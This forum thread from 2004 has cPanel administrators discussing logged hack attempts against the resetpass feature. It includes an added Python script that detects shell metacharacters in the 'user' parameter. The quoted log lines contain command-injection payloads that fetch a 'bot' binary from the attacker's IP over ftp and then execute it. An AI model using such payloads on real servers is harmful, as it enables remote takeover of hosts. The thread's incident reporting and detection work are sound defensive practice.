The Community Forums

Interact with an entire community of cPanel & WHM users!

cpanel hack attempts through resetpass script

Discussion in 'General Discussion' started by dezignguy, Dec 18, 2004.

  1. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    Hmm, I noticed these attempts to get into my server in the cpanel log... there were more than just these as well.


    Code:
    69.242.156.150 -  [14/Dec/2004:16:43:13 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}open${BLA}69.242.156.150${BLA}28827\\nuser${BLA}ftp${BLA}bla\\nget${BLA}bot\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0" 200 0 "" ""
    69.242.156.150 -  [14/Dec/2004:16:43:13 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0" 200 0 "" ""
    
    69.159.71.154 -  [17/Dec/2004:12:33:23 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}open${BLA}69.159.71.154${BLA}3528\\nuser${BLA}ftp${B$A}bla\\nget${BLA}bot\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0" 200 0 "" ""
    69.159.71.154 -  [17/Dec/2004:12:33:24 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0" 200 0 "" ""
    
    I know there's a 200 successful code there... but I checked and they get back a page with "This feature is disabled."

    I'm fairly sure that this had to do with the cpanel hack a while back where the 'allow users to reset their password by email' function had a security hole and allowed hackers into the server, where they could then try a local root exploit to totally 0wn the box. Since my clients don't use it anyways, I totally disabled the function even after it had been fixed. But I guess there are enough people running old cpanel versions to make it somewhat worthwhile to scan a bunch of hosts for this hack? Or is this a new security problem?
     
    #1 dezignguy, Dec 18, 2004
    Last edited: Dec 18, 2004
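A small log check for the pattern quoted above, added here as an example and not code from the thread or from cPanel: it parses lines in that access-log format and flags resetpass requests whose decoded `user` value carries shell metacharacters, without filtering on the status code (the post notes these returned 200). The log lines are constructed with documentation IPs; `SHELL_META`, `parse_line` and `find_resetpass_injection` are names chosen for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines (not the real entries) modelled on the cpanel
# access-log format quoted in the post; IPs are documentation addresses.
SAMPLE_LOG = r"""
198.51.100.7 -  [14/Dec/2004:16:43:13 -0800] "GET /resetpass/?user=%7C%60BLA=$'\x20';echo${BLA}hi%60%7C HTTP/1.0" 200 0 "" ""
198.51.100.7 -  [14/Dec/2004:16:43:14 -0800] "GET /resetpass/?user=%7C%60BLA=$'\x20';./bot%60%7C HTTP/1.0" 200 0 "" ""
203.0.113.9 -  [14/Dec/2004:17:01:02 -0800] "GET /resetpass/?user=alice HTTP/1.0" 200 0 "" ""
203.0.113.9 -  [14/Dec/2004:17:05:44 -0800] "GET /frontend/x/index.html HTTP/1.0" 200 1234 "" ""
"""

# client - [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) -\s+\[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Characters a legitimate account name never contains; their presence in
# the decoded user value is the signal, whatever the status code was.
SHELL_META = re.compile(r"[|`$;]")

def query_params(query):
    """Decode a raw query string by hand so parse_qs separator rules don't matter."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params

def parse_line(line):
    """Split one access-log line into its fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    return {"ip": ip, "ts": ts, "method": method, "path": parts.path,
            "params": query_params(parts.query), "status": int(status)}

def find_resetpass_injection(log_text):
    """Return resetpass requests whose 'user' value decodes to shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/resetpass"):
            continue
        user = rec["params"].get("user", "")
        if SHELL_META.search(user):
            hits.append({"ip": rec["ip"], "ts": rec["ts"],
                         "status": rec["status"], "user": user})
    return hits
```

Run `find_resetpass_injection(SAMPLE_LOG)` to see the two flagged requests; the decoded `user` field shows the pipe and backtick characters that the percent-encoding in the raw log hides.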
  2. brentp

    brentp Well-Known Member

    Joined:
    Mar 11, 2004
    Messages:
    324
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Ayr, North Queensland, Australia
    Phatbot

    Yes, that was a zombie trying to get root on your box. I will have to submit the source code of that exploit to cPanel sometime soon. Just don't re-enable that page, because I'm sure that bug might not have been fixed. It might've, I don't know.

    Regards,
    Brent
     
  3. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    I thought it was fixed on an older stable.
     
  4. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    That's what I thought too...
    But the setting is staying off anyways... just in case.
     
  5. navmonkey

    navmonkey Well-Known Member

    Joined:
    Aug 19, 2003
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
    Is there any problem to activate the reset password option in the latest Stable release? Thanks.
     
  6. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    We have it enabled on all our boxes and we have no issues. We enabled the feature shortly after cpanel released a fix a while back.
     
  7. oshs

    oshs Well-Known Member
    PartnerNOC

    Joined:
    Sep 5, 2004
    Messages:
    146
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    Where are these Cpanel logs available please?
     
  8. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    Guessing '/usr/local/cpanel/logs' perhaps?
     